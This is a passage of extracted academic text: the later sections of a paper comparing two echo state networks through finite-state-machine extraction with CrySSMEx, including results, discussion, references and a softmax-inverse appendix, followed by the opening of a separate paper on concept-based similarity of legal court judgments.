training sentences are of the form ‘Nfem V Nmale that Nfem V [end]’, that is, they have the same structure as the test sentences. The right panel of Figure 3 shows the networks’ performance on these training sentences. Again, ESN+ does better than ESN, but the difference is much smaller than it was for test sentences. Interestingly, ESN+ performs nearly as well on test sentences as on training sentences, indicating that it has reached the highest level of generalisation that might be expected. The standard ESN, on the other hand, performs badly at several points of test sentences compared with the same points on training sentences. 4.2. Extracted FSMs The quantitative findings presented above are not particularly surprising as they basically form a replication of Frank and Čerňanský (2008). The contribution of this paper lies in CrySSMEx’s qualitative analysis of two trained networks and of the difference between them. Both networks were given all 2700 test sentences as well as all 2700 sentences of the form ‘Nfem V Nmale that Nfem V [end]’. These latter sentences could have been in the training set but, as mentioned above, only 11 of them were. During processing of the sentences, the networks’ inputs, internal states, and discretised outputs were recorded. Next, CrySSMEx was applied to these data, for ESN and ESN+ separately. 4.2.1. ESN+ Figure 4 shows the FSM that CrySSMEx extracted from the ESN+ data after three iterations. This FSM is fully deterministic, indicating that CrySSMEx has converged after this iteration. The FSM has six states, indicated by the circles numbered 0–5. The machine moves from one state to the next when it receives as input one of the words in the box connecting the two states. At the beginning of a sentence, the FSM must be in State 0 since this is the only state that is entered when receiving the input symbol [end]. Moreover, there is no other way to enter this state, showing that it does not occur at any other point in the sentence. When in this state, the network predicts the following input to be a noun, and indeed, all sentences of the language start with a noun, moving the FSM into State 1. Here, it predicts the next word to be a verb, irrespective of whether the input was a male or a female noun. This is remarkable because in the network training data, a verb can only follow a male noun in some SRC constructions, such as mice that D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 12 S.L. Frank and H. Jacobsson 0:N boys, brothers, men, girls, sisters, women 1:V avoid, bump, chase, eat, like, follow, hit, love, see, swing 2:N boys, brothers, men, girls, sisters, women 3:[end] [end]that 4:N boys, brothers, men, girls, sisters, women 5:V avoid, bump, chase, eat,like, follow, hit, love, see, swing Figure 4. Final finite state machine extracted from ESN+. Circles denote network states. The symbol inside a circle is the output symbol (syntactic category) generated from that state. Words in boxes are the input symbols (words) that move the automaton from one state to the next. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 13 like men chase cats [end]. Only 98 times in the 5000 training sentences did a verb directly follow a male noun, and never at the beginning of a sentence. The correct prediction of a verb in State 1, therefore must result from the previous input being a ‘subject’ and not just a ‘male noun’. That is, ESN+ is more sensitive to the grammatical role of the noun than to its identity. Otherwise, it would not have predicted a verb to come next. In fact, the FSM of Figure 4 makes no difference whatsoever between male and female nouns: whenever a noun allows for a particular state transition, all nouns do. This means that all nouns are equivalent to the FSM, even though male and female nouns are restricted to particular grammatical roles in training sentences. In other words, the network from which the FSM was extracted shows perfect generalisation to test sentences.4 After receiving the sentence’s second word (a verb), the FSM moves to State 2, where it predicts the next input to be a noun. Indeed a noun occurs next, moving the FSM to State 3. Here, the end-of-sentence marker is predicted, which is incorrect in the sense that the sentence is not yet over. However, it is a grammatically correct prediction: [end] can indeed follow ‘N V N’. After receiving that, the FSM is in State 4, where the next input is predicted to be a noun, that is, an ORC is expected. It may seem surprising that the FSM never expects an SRC at this point (i.e., it never predicts a verb) even though that would be perfectly grammatical. Presumably, a noun is always expected here because ORCs occur more often than SRCs: according to the grammar of Table 1, ORCs are 50% more frequent than SRCs. The next two inputs are a noun (moving the system into State 5) and a (correctly predicted) verb. The FSM ends up in State 3, where it correctly predicts [end]. It is now back in its starting state. No error (i.e., no grammatically incorrect prediction) was made in processing any of the 5400 sentences. 4.2.2. Echo state networks First iteration. Figure 5 shows the FSM extracted from the ESN data after the first CrySSMEx iteration. It has only three states at this point, but CrySSMEx did not yet terminate as is apparent from the FSM being stochastic: in many cases, a particular input word licences several transitions from the same state. For example, if the FSM is in State 0 and receives the word brothers, it moves to State 1 (where it predicts a verb) in only 40% of the cases. Alternatively, it can remain in State 0 and predict another noun to come next. That prediction is ungrammatical because a noun can never directly be followed by a noun. Yet, in over 29% of the cases, receiving a noun in State 0 results in the ungrammatical prediction of a noun. Looking at Figure 3, ESN seems to perform only slightly worse than ESN+ after noun inputs. We can now conclude that this is somewhat misleading. The small quantitative advantage of ESN+ over ESN (at noun inputs) in fact corresponds to a very large qualitative improvement: whereas ESN+ makes no errors, ESN often predicts a noun to follow a noun. It is important to keep in mind that this is not an error of the extracted FSM. It correctly describes the behaviour of the ESN, which erroneously predicts a noun to follow a noun. Although the FSM is correct in this sense, it is not complete: for instance, it must be in State 0 at the beginning of a sentence (i.e., after processing [end]) but that same state can also be entered after processing a noun or verb. Another error that can be observed in the FSM of Figure 5 is the occasional prediction of a verb (i.e., being in State 1) after processing a verb. Although the language does allow for a verb to be directly followed by another (e.g, mice that men like chase cats [end]), this is not possible in any of the ‘N V N that N V [end]’-sentences processed by the FSM. Possibly, this error accounts for ESN’s low prediction performance (Figure 3) at the sentence-final verb, that is, when [end] is the only correct prediction. Further insight into this error can be obtained from the FSM extracted at the second CrySSMEx iteration. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 14 S.L. Frank and H. Jacobsson 0:N [end], that, boys: .47, brothers: .28, men: .27, girls: .29, women: .33, sisters: .12, avoid: .96, bump: .96, chase: .96, eat: .96, like: .96, follow: .96, hit: .93, love: .96, see: .96, swing: .96 boys: .20, brothers: .40, men: .41, girls: .67, sisters: .72, women: .62, hit: .03 boys: .33, brothers: .32, men: .32, girls: .04, sisters: .16, women: .04, avoid: .04, bump: .04, chase: .04, eat: .04, like: .04, follow: .04, hit: .04, love: .04, see: .04, swing: .04 1:V [end], that, avoid: .85, bump: .84, chase: .74, eat: .83, like: .83, follow: .85, hit: .77, love: .80, see: .88, swing: .83 chase: .06, follow: .00, hit: .04 avoid: .15, bump: .16, chase: .20, eat: .17, like: .17, follow: .15, hit: .19, love: .20, see: .14, swing: .17 2:[end] [end], that Figure 5. First (stochastic) finite state machine extracted from ESN. If a particular input word licences more than one transition from a state, the probability of a transition is given after the word. Second iteration. In its second iteration, CrySSMEx splits the three states into seven, resulting in the FSM shown in Figure 6. The fact that it is not deterministic shows that CrySSMEx has not yet converged, so more iterations are needed for further refinement. Although this FSM has only one more state than the one extracted from the ESN+ data (Figure 4), it is much more complex, making it difficult to interpret in full. For this reason, we will not discuss it in depth, but only point out how it sheds light on ESN’s low prediction per- formance at the sentence-final verb. Also, the FSM shows why there is a large difference between the performance on training and test sentences at this point. To begin with, note that State 0 must be the sentence-initial state, as it is the only state entered after the input [end]. If the input is a potential training sentence (i.e., ‘Nfem V Nmale that Nfem V [end]’), the path through the machine’s states is easy to follow. The first word, a female noun, must move the FSM into State 1, where a verb is correctly predicted. The incoming verb will nearly always result in State 2, predicting a noun. The following input is a male noun, moving the FSM into State 6. Here, the prediction [end] is grammatical, although the actual next input is that, resulting in State 3 in as much as 95% of the cases. The incoming female noun will most D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 15 0:N boys: .84, men: .01 boys: .16, brothers, men: .99, girls, sisters, women 1:V love: .00 love: .21 [end] avoid, bump, chase, eat, like, follow, hit: .98, love: .79, see, swing hit: .02 2:N boys, brothers, men, girls: .13, sisters: .47, women: .13, avoid: .04, bump: .04, chase: .04, eat: .04, like: .04, follow: .04, hit: .04, love: .04, see: .04, swing: .04 that: .83 [end], that: .17 girls: .87, sisters: .37, women: .87, avoid: .96, bump: .96, chase: .96, eat: .96, like: .96, follow: .96, hit: .93, love: .96, see: .96, swing: .96 hit: .03 sisters: .173:N boys: .04 [end] boys: .47, brothers, men: .93, women: .13 boys: .49, men: .07, girls: .39, sisters: .20 girls: .04, sisters: .44 girls: .57, sisters: .36, women: .87 4:V love: .09 avoid, bump, eat, like, follow: .95, hit: .59, love: .91, see, swing chase, follow: .05, hit: .41 5:V avoid: .77, bump: .78, chase, eat: .86, like: .83, follow: .74, hit: .96, love: .97, see: .70, swing: .83 that: .80 that: .20 avoid: .23, bump: .22, eat: .14, like: .17, follow: .26, hit: .04, love: .03, see: .30, swing: .17 6:[end] that: .95[end], that: .05 Figure 6. Second finite-state machine extracted from ESN. often put the FSM into State 5, although States 2 and 4 are also possible. At this point, the only grammatically correct prediction is [end], that is, the FSM should move into State 6. Indeed, a large majority of verb inputs at State 5 yield State 6, but some errors (i.e, a noun prediction at State 2) are also possible. If the FSM was not in State 5 but in State 4, it cannot end up in the correct State 6. Likewise, if the machine was in State 2 (rather than 4 or 5) a verb input is very unlikely to move it to State 6. In short, there is not much opportunity for errors in training sentences, except at the sentence- final verb. This finding corresponds to ESN’s prediction performance on training sentences, as displayed in Figure 3. But how about test sentences? Be reminded that after processing the sentence-final verb, the FSM should be in State 6. This state can be entered from States 1–3 and 5, but only from State 5 it is likely that verb input results in State 6. From States 1–3, there is only a D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 16 S.L. Frank and H. Jacobsson 1 6 12 0 100 200 CrySSMEx iteration N u m b e r o f F S M s ta te s Figure 7. Number of states in the FSMs extracted from ESN, after each CrySSMEx iteration. very small probability that a verb moves the FSM into State 6. Therefore, we can safely conclude that the machine should be in State 5 immediately before the sentence-final verb arrives. However, note that State 5 can only be entered when the input is a female noun whereas the actual input at this point in test sentences is always a male noun. Hence, when the input is a test sentence, the FSM is not in State 5 when it needs to be. Consequently, it will hardly ever predict [end] when it needs to. This explains the large difference in ESN prediction error between training and test sentences at the sentence-final verb. Further iterations. As CrySSMEx continues to extract increasingly deterministic FSMs from the ESN, the number of states rises sharply, as can be seen in Figure 7. After 12 iterations, CrySSMEx has converged at an FSM with as many as 190 states. 4.3. State-space quantisation So far, we have only looked into the extracted machines themselves. Machines that, to a large extent, reflect the network behaviour and grammatical correctness rather than their internal dynam- ics. In addition to these FSMs, CrySSMEx generates hierarchical descriptions of the networks’ state space quantisations. Since these CVQ graphs form a rough description of the layout of the state space, they potentially hold important qualitative information about the networks’ dynamics. The CVQ graph describing the state space of ESN+, displayed in Figure 8 shows that ESN+ is trivially mapped onto an FSM: it takes at most five quantisations to determine the FSM state for any state vector in the network. For the state space of ESN, the situation is remarkably different. Figure 6 shows just a small part of the CVQ graph corresponding to the first FSM extracted from the ESN data (i.e., the one in Figure 5). This FSM has fewer states than the final machine extracted from ESN+, yet the CVQ graph is immensely more complex. In short, this tells us that the state space of ESN is much more fragmented than that of ESN+. Consequently, CrySSMEx needs to work a lot harder to render an FSM description for ESN than for ESN+. 5. Discussion 5.1. Comparing network behaviours We have presented the first ever application of CrySSMEx for a qualitative comparison of the behaviours of two networks. The algorithm proved to provide more insight than was obtained from a merely quantitative investigation of network performance. The difference in performance D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 17 VQ VQ VQ VQ VQ 3VQ VQ VQ VQ 1 5 VQ 2 0 4 Figure 8. Arrangement of Vector Quantisers (VQ) for splitting the ESN+ state space (corresponding to the FSM of Figure 4). The FSM state to which a given state vector belongs is decided by starting at the root VQ and following the graph according to the winning model vector of each VQ. Arrows with a dot denote a merger of states. between ESN and ESN+ turned out to be the consequence of a much more significant, qualitative difference in their behaviours. Comparing the two extracted FSMs in Figures 4 and 6, it becomes clear that the two networks implement very different machines. In fact, it is hard to imagine that the RNNs that gave rise to these FSMs are nearly identical and process the same input sentences. The only difference between ESN+ and ESN is that the first has input connection weights that were adapted to the training data, whereas the second uses a random permutation of these. Apparently, this small difference has immense consequences for the networks’ dynamics and behaviour: ESN+ implements a straightforward FSM with six states, whereas the FSM extracted from ESN has 190. Even if we restrict ourselves to the non-deterministic, seven-state FSM after the second iteration of CrySSMEx, the behaviour of ESN already turns out to be much more complex than that of ESN+. Looking at Figures 6 and 7, it becomes clear that a system that should be relatively simple (processing just one type of seven-word sentence) can implement an oversized FSM. The primary D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 18 S.L. Frank and H. Jacobsson reason why the ESN data causes the extracted FSMs to grow so large is that CrySSMEx will blindly keep refining the extracted rules, also with respect to undesired behaviour by the network. In this case, the desired grammar, as instantiated by ESN+, is computationally much simpler than the erratic one instantiated by ESN. Since CrySSMEx is ignorant about which behaviour is desired and which is not, it cannot be blamed for creating huge FSMs. It merely shows us the networks’ behaviour. The more com- plex that behavior, the more complex the extracted FSM. Thanks to the iterative approach of the algorithm, however, the FSMs extracted in the first few iterations can be quite informative. Although they are incomplete, they may provide a comprehensible ‘summary’ of the complete, but incomprehensible, deterministic FSM that is implemented by the network. 5.2. Comparing network state spaces In an early comparison between SRNs and FSMs (Servan-Schreiber, Cleeremans, and McCelel- land 1991), the term graded state machine was tossed to describe the type of system embodied by an SRN. The difference with an FSM is that a graded state machine has (possibly infinite) non-discrete states. Each point in an SRN’s state space can be considered a state of the machine, and states that are near to each other in the state space tend to (but do not necessarily) result from similar inputs and have similar effects on the network. ESN+ makes uses of this graded nature of the state space by using inputs that are not truly symbolic. As pointed out by Frank and Čerňanský (2008), the vector of weights emanating from a particular input unit can be viewed as the representation of the word corresponding to that input, and adapting these weights results in representations that are analogical rather than symbolic: similarities among word representations are analogical to similarities among the grammatical properties of the represented words. More specifically, words from the same syntactic category are represented by vectors that are more similar to each other than vectors representing words from different categories, as is also apparent from Figure 2. Each input word drives the activation pattern in ESN’s dynamical reservoir towards an attractor point that is unique for that input (Tinǒ, Čerňanský and Beňušková 2004). Because of the analogical nature of word representations in ESN+, the attractor points associated with words from the same syntactic category will be closer together than those of words from different categories. As a result, FSM states that are functionally equivalent correspond to ESN+ state-space points that are near to one another. Such clustering of equivalent states facilitates state-space quantisation. Presumably, this is why CrySSMEx converges after just three iterations when processing the ESN+ data. Moreover, the state-space clustering improves generalisation. This is because processing a test sentence leads to a state-space trajectory that visits the same clusters that were encountered during ESN+ training. In other words, new sentences result in not-so-new internal network states. For ESNs, however, the situation is radically different. Since its input weights are fixed at random values (i.e., it uses symbolic rather than analogical word representations) the distribution of attractors in its state space is basically random. Even two states that are functionally equivalent can correspond to distant points in the state space. As a result, many splits and merges are required for a meaningful quantisation, delaying CrySSMEx convergence and resulting in the highly complex CVQ graph, part of which is displayed in Figure 9. Also, the generalisation is impaired because the state-space trajectory resulting from a new sentence is largely unrelated to what was encountered during ESN training. To summarise, we have found the impoverished generalisation of ESN to be related to the relative complexity of its internal dynamics, as apparent from the size of its CVQ graph. As mentioned in section 2.2.2, the depth and size of CVQ graphs are partly governed by the quality of the underlying quantisation algorithm: the worse the quantiser, the larger the CVQ D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 19 VQ VQ VQ VQ 0 VQ VQ VQ VQ VQ VQ VQ VQ VQ VQ VQVQ VQ VQ VQ VQ VQ VQVQ VQ VQ VQ VQ VQ VQ VQ VQ VQVQVQ VQ VQ VQ VQ VQ Figure 9. Small fragment of the arrangement of Vector Quantisers (VQ) for splitting the ESN state space (corresponding to the FSM of Figure 5). graph. Hence, the size of the CVQ graph for ESN (Figure 9) is partly due to the simplicity of the quantiser that was used, rather than from the actual dynamics of the system. However, the immense difference between the CVQ graphs for ESN and ESN+ cannot all be blamed on the quantiser’s suboptimality. Therefore, even without a more sophisticated quantisation algorithm, we can provide a reasonable suggestion about what goes on inside the network, and how the dynamics of the two networks underlies their quantitative and qualitative differences. 6. Conclusion CrySSMEx allows finite state descriptions to be generated from high-dimensional and complex ESNs, opening up a new window into the internal workings of specific ESN instances. In this paper, we have only scraped the surface of the interesting dynamics of ESNs. Only a small step was made towards understanding exactly how and why ESN+ manages to utilise its state space in a manner that governs a deeper correspondence to the intended grammar. It is our hope and conjecture that CrySSMEx may provide much deeper insights into these systems than presented in this paper, insights that may lead to further improvements beyond those of the ESN+ model. Acknowledgements This research was supported by grant 277-70-006 from the Netherlands Organisation for Scientific Research (NWO) and by EU grant FP6-004250-IP. Notes 1. CrySSMEx can be downloaded from http://cryssmex.sourceforge.net/ 2. This is because it has been argued that people only need to experience a word in one grammatical position to generalise it to novel positions. Consequently, neural networks should also have this ability in order to be regarded as cognitive models of human language processing (Hadley 1994). D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 20 S.L. Frank and H. Jacobsson 3. Note that all nouns within each of the three subcategories (as well as all verbs) are interchangeable in the training sentences. As a result, their representations will become more and more similar as the number of training sentence is increased. 4. That is, when outputs are discretised by syntactical category. As Figure 3 shows, the output vectors of ESN+ are not identical to the true probability distributions. References Andrews, R., Diederich, J. and Tickle, A.B. (1995), ‘Survey and Critique of Techniques for Extracting Rules from Trained Artificial Neural Networks’, Knowledge Based Systems, 8, 373–389. Bodén, M. and Wiles, J. (2000), ‘Context-free and Context-Sensitive Dynamics in Recurrent Neural Networks’, Connection Science, 12, 196–210. Bullinaria, J.A. and Levy, J.P. (2007), ‘Extracting Semantic Representations from Word Co-Occurrence Statistics: A Computational Study’, Behavior Research Methods, 39, 510–526. Čerňanský, M. and Tiňo, P. (2007), ‘Comparison of echo state networks with simple recurrent networks and variable-length markov models on symbolic sequences’, in Artificial Neural Networks – ICANN 2007, Part I (vol. 4668), eds. J.M. de Sá, L.A. Alexandre, W. Duch and D.P. Mandic, Lecture Notes in Computer Science, Berlin: Springer, pp. 618–627. Čerňanský, M. and Tiňo, P. (2008), ‘Processing Symbolic Sequences Using Echo-State Networks’, in From associations to rules: Proceedings of the 10th Neural Computation and Psychology Workshop, eds. R.M. French, and E. Thomas, Singapore: World Scientific, pp. 153–159. Čerňanský, M., Makula, M. and Beňušková Ľ. (2008), ‘Improving the state space organization of untrained recurrent networks’, in Proceedings of the 15th International Conference on Neural Information Processing, Auckland, New Zealand. Elman, J.L. (1990), ‘Finding Structure in Time’, Cognitive Science, 14, 179–211. Frank, S.L. (2006a), ‘Learn More by Training Less: Systematicity in Sentence Processing by Recurrent Networks’, Connection Science, 18, 287–302. Frank, S.L. (2006b), ‘Strong Systematicity in Sentence Processing by an Echo State Network’, in Artificial Neural Net- works – ICANN 2006, Part I (vol. 4131), eds. S. Kollias, A. Stafylopatis, W. Duch, and E. Oja, Lecture Notes in Computer Science, Berlin: Springer, pp. 505–514.. Frank, S.L. and Čerňanský, M. (2008), ‘Generalization and systematicity in echo state networks’, in Proceedings of the 30th Annual Conference of the Cognitive Science Society, eds. B.C. Love, K. McRae, and V.M. Sloutsky, Austin, TX: Cognitive Science Society, pp. 733–738. Hadley, R.F. (1994), ‘Systematicity in Connectionist Language Learning’ Mind and Language, 9, 247–272. Hopcroft, J. and Ullman, J.D. (1979), Introduction to Automata Theory, Languages, and Compilation, Reading, MA: Addison-Wesley Publishing Company. Jacobsson, H. (2005), ‘Rule Extraction from Recurrent Neural Networks: A Taxonomy and Review’, Neural Computation, 17, 1223–1263. Jacobsson, H. (2006a), ‘The crystallizing substochastic sequential machine extractor: Cryssmex’, Neural Computation, 18, 2211–2255. Jacobsson, H. (2006b), ‘Rule Extraction from Recurrent Neural Networks’, uppublished doctoral dissertation, Department of Computer Science, University of Sheffield, Sheffield, UK. Jacobsson, H., Frank, S.L. and Federici, D. (2007), ‘Automated abstraction of dynamic neural systems for natural language processing’, in Proceedings of the International Joint Conference on Neural Networks, Orlando, FL, pp. 1446–1451. Jaeger, H. (2001), ‘The “Echo State” Approach to Analysing and Training Recurrent Neural Networks’, GMD Report No. 148, GMD – German National Research Institute for Computer Science, http://www.faculty.iu- bremen.de/hjaeger/pubs/EchoStatesTechRep.pdf. Jaeger, H. (2003), ‘Adaptive Nonlinear System Identification with Echo State Networks’, in Advances in Neural Infor- mation Processing Systems (Vol. 15), eds. S. Becker, S. Thrun and K. Obermayer, Cambridge, MA: MIT Press, pp. 593–600. Mirkin, B. (1996), Mathematical Classification and Clustering (Vol. 11), Dordrecht, The Netherlands: Kluwer Academic Publishers. Servan-Schreiber, D., Cleeremans, and A. McClelland, J.L. (1991), ‘Graded State Machines: The Representation of Temporal Contingencies in Simple Recurrent Networks’, Machine Learning, 7, 161–193. Tiňo, P., Čerňanský, M. and Beňušková, Ľ. (2004) ‘Markovian architectural bias of recurrent neural networks’, IEEE Transactions on Neural Networks, 15, 6–15. Tong, M.H., Bickett, A.D., Christiansen, E.M. and Cottrell, G.W. (2007), ‘Learning Grammatical Structure with Echo State Networks’, Neural Networks, 20, 424–432. Appendix 1. Inverse of softmax The softmax function (Equation (3)) does not have an inverse in general. However, it is possible to define a proper inverse for the particular target vectors that arise in our ESN training procedure. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 Connection Science 21 We have a network with n output units, one of which (called unit c) represents the correct output for each input vector. In the corresponding target output vector u = (u1, . . . , un), element c should have large value (i.e., close to 1) whereas all other elements should have small values (i.e., close to 0). That is uj = { 1 − �c if j = c �i if j �= c. Ideally, �c = �i = 0, making uc = 1 and ui = 0. However, the softmax inverse will be applied to u and its domain does not contain 0 and 1. Therefore, we take �c, �i > 0. Also, it is desired that uc > ui , so 1 − �c > �i . From here on, we denote by i all output units that are not c, so always i �= c. Note that we assume that the target values �i are equal for all i. We are looking for the inverse of the softmax function, that is, we want to find xi and xc such that exi∑n j =1 e xj = �i and exc∑n j =1 e xj = 1 − �c. (A1) First, note that ∑n j =1 e xj = exc + (n − 1)exi . Therefore, Equation (A1) becomes exi = �i exc + �i (n − 1)exi and exc = (1 − �c)exc + (1 − �c)(n − 1)exi ⇐⇒ exc = exi ( 1 − n�i + �i �i ) and exc = exi ( (1 − �c)(n − 1) �c ) ⇐⇒ xc = ln ( 1 − n�i + �i �i ) + xi and xc = ln ( (1 − �c)(n − 1) �c ) + xi . (A2) Since uc > ui , we must have xc > xi , so 1 − n�i + �i �i > 1 ⇐⇒ �i < n−1. From Equation A2, it is clear that 1 − n�i + �i �i = (1 − �c)(n − 1) �c , which yields �c = (n − 1)�i . This means that �i and �c cannot be set independently: choosing some minimum target value �i < n −1 fixes �c as well. The total target output is∑ j uj = (1 − �c) + (n − 1)�i = 1 − (n − 1)�i + (n − 1)�i = 1. Therefore, the target vector forms a probability distribution. By choosing a low enough value for �i , the difference between xc and xi is fixed as in Equation A2: xc = ln(�−1i − n + 1) + xi . As it turns out, it is only this difference that matters in practice: adding a constant value y to xc and xi does not change the networks’ output. Let Wy,out denote the output connection weights resulting from this addition of y (for convenience, we ignore the bias vector). As in Equation (4) of Section 3.2.2, A is the matrix of DR states resulting from the training inputs, and U is the matrix of corresponding target outputs. The resulting connection weights are Wy,out = ( f−1out (U) + y ) A+ = f−1out (U)A+ + yA+ = Wout + yA+. After training, the network receives an input resulting in the DR state adr . Its output becomes (see Equation (2) in Section 3.2.1): fout (Wy,out adr ) = fout (Wout adr + y|A+adr |), which equals fout (Wout adr ) because the softmax function is translation invariant (i.e., fj,out(x + a) = fj,out(x)). Since it does not matter whether the connection weights are Wout or Wy,out , adding y to xc and xi has no effect. We can therefore simply take xi = 0. To summarise, all that is needed for training an ESN with the softmax output activation is to choose an �i < n −1. The softmax inverse of the target outputs then equals: f −1 j,out(u) = { ln(�−1 i − n + 1) if j = c 0 if j �= c. D o w n l o a d e d B y : [ U n i v e r s i t e i t v a n A m s t e r d a m ] A t : 1 4 : 0 6 2 5 M a r c h 2 0 1 0 work_euxlou6l5nfy5prownqslmn7qq ---- Submitted 2 May 2019 Accepted 10 February 2020 Published 23 March 2020 Corresponding author Rupali S. Wagh, rupali.wagh@christuniversity.in Academic editor Fabrizio Sebastiani Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.262 Copyright 2020 Wagh and Anand Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Legal document similarity: a multi- criteria decision-making perspective Rupali S. Wagh1,* and Deepa Anand2,* 1 Department of Computer Science, JAIN Deemed to be University, Bangalore, Karnataka, India 2 Department of Information Science and Engineering, CMR Institute of Technology, Bangalore, Karnataka, India * These authors contributed equally to this work. ABSTRACT The vast volume of documents available in legal databases demands effective infor- mation retrieval approaches which take into consideration the intricacies of the legal domain. Relevant document retrieval is the backbone of the legal domain. The concept of relevance in the legal domain is very complex and multi-faceted. In this work, we propose a novel approach of concept based similarity estimation among court judgments. We use a graph-based method, to identify prominent concepts present in a judgment and extract sentences representative of these concepts. The sentences and concepts so mined are used to express/visualize likeness among concepts between a pair of documents from different perspectives. We also propose to aggregate the different levels of matching so obtained into one measure quantifying the level of similarity between a judgment pair. We employ the ordered weighted average (OWA) family of aggregation operators for obtaining the similarity value. The experimental results suggest that the proposed approach of concept based similarity is effective in the extraction of relevant legal documents and performs better than other competing techniques. Additionally, the proposed two-level abstraction of similarity enables informative visualization for deeper insights into case relevance. Subjects Artificial Intelligence, Computational Linguistics, Data Science, Digital Libraries Keywords Legal Information Retrieval, Concept Based Similarity, Multi-Dimensional Similarity, OWA, Concept interaction graph INTRODUCTION Easy availability of legal information resources through online legal databases has provided much-required acceleration to the research in the domain of legal information retrieval (LIR). LIR aims at retrieving legal information objects relevant to a user’s query. Legal information objects are various documents like court transcripts, verdicts, legislation documents, and judgments that are generated during the course of a legal process. These documents are primary resources for the interpretations of the law of any judiciary and hence are required by a legal professional for decision making as well as argumentation. Specific characteristics of legal documents like document size, document internal structure, temporal properties, specific legal terminology, polysemy, and heterogeneity make LIR different extremely complex as compared to other domains. Since every legal document presents one or more legal issue, the legal domain demands How to cite this article Wagh RS, Anand D. 2020. Legal document similarity: a multi-criteria decision-making perspective. PeerJ Com- put. Sci. 6:e262 http://doi.org/10.7717/peerj-cs.262 https://peerj.com/computer-science mailto:rupali.wagh@christuniversity.in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.262 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.262 context based document retrieval than just data based retrieval. Contextualization of a legal issue is a non-trivial task due to the inherent complexities of this domain. Additionally, the concept of ‘‘match’’ or ‘‘relevance’’ is multi-dimensional in the legal domain (Van Opijnen, 2012). LIR is thus a very challenging research field as the domain necessitates for very generic to a very specific abstraction of a legal document at the same time. Retrieving relevant legal document from a huge collection of resources requires a deep understanding of the notion of relevance in this domain and intelligent methods for identification and representation of legal concepts for establishing relevance. Finding similarity among legal documents, specifically among court judgments is one of the most studied problems under LIR. Methods and techniques used in LIR originate from confluence of four major technologies: namely Artificial Intelligence (AI), Network Analysis, Machine Learning and NLP (Bench-Capon et al., 2012). Legal knowledge is very complex and is available in various documents written in natural languages. Ontology, a branch of AI, is widely used to facilitate effective knowledge management in the legal domain (Saravanan, Ravindran & Raman, 2009). Knowledge engineering using semantic web and ontology for specific sub-domains of law is practiced popularly (Casanovas et al., 2016) due to the ease of modeling legal actors, agents, and relationships using these technologies. With the advents in other technological domains, legal ontological solutions are also upgraded to incorporate more scalable, re-usable, context-aware and user- centered approaches in the existing framework. Citations or bibliographical relevance in the legal domain is extremely important for understanding the interpretations and applications of law and a network is the most obvious representation of data for legal citation analysis. Thus, citation network analysis explicably remains one of the very popular techniques in LIR. Earlier approaches predominantly use network degree statistics and structural properties for extraction of relevant documents in the legal domain (Van Opijnen, 2012; Koniaris, Anagnostopoulos & Vassiliou, 2017). Approaches which use centrality and between-ness of a node in a case citation network (Wagh & Anand, 2017) to find similarity among Indian court judgments are proposed. But, with the recent advancements in deep learning based graph embedding models (Cui et al., 2018), graph and all its components can be represented as dense feature vectors enabling exploration of newer models in network analysis for LIR. (Sugathadasa et al., 2018) use node embeddings obtained using node2vec algorithm (Goyal & Ferrara, 2018; Grover & Leskovec, 2016) for case citation data for finding similar legal documents. Analysis of case citation data using machine learning methods to estimate similarity among cases has also been experimented in the past. Coupling of bibliographic information with text in the paragraph of judgments (Kumar et al., 2013) for estimation of similarity between two judgments is proposed. Exploring relatedness among cases by finding common citations is proposed (Nair & Wagh, 2018) where authors present application of association rule mining to estimate similarity value. While citation based similarity among court cases is undoubtedly of very high significance in legal domain, the case citations graphs are generally very sparse (Mandal et al., 2017a; Mandal et al., 2017b). Moreover, semantic relationships among the case judgments and their interpretation are implicitly available as text within a judgment document. Natural language processing (NLP), along with Wagh and Anand (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.262 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.262 machine learning methods are used to establish semantic relevance of textual contents present in the documents (Branting, 2017). Until recently, Vector Space Model and Latent Semantic Indexing, LSI with its variants were used largely for semantic representation of text. With the emergence of word/document embeddings, information retrieval is now shifted to neural information retrieval (Onal et al., 2018). Dense vector representations of word and document obtained using deep learning based models are used as input for machine learning algorithms. The strength of these models lies in capturing the semantics of text and thereby recognizing document similarities without exact word-match. Many studies highlight the effectiveness of neural embedding for text Mandal et al. (2017a), Mandal et al. (2017b) and Vo, Privault & Guillot (2017) for Legal Information retrieval. Finding relevant precedents (judgments) is one of the most widely studied problems in LIR. A court judgment is a complex document with various sections describing the application of law to the legal issues discussed during the case proceedings. There is a general agreement on the need for concept-based document retrieval in legal domain, and the approaches for LIR largely focus on obtaining a single representation of document covering all legal concepts present in the document which results in single similarity value. One of the major limitations of these approaches is the inability to provide interpretations of relevance for in-depth understanding. While a single numeric value for measuring relevance is undoubtedly of very high significance in information retrieval, user satis- faction in an IR system also depends on intuitively informative results provided by 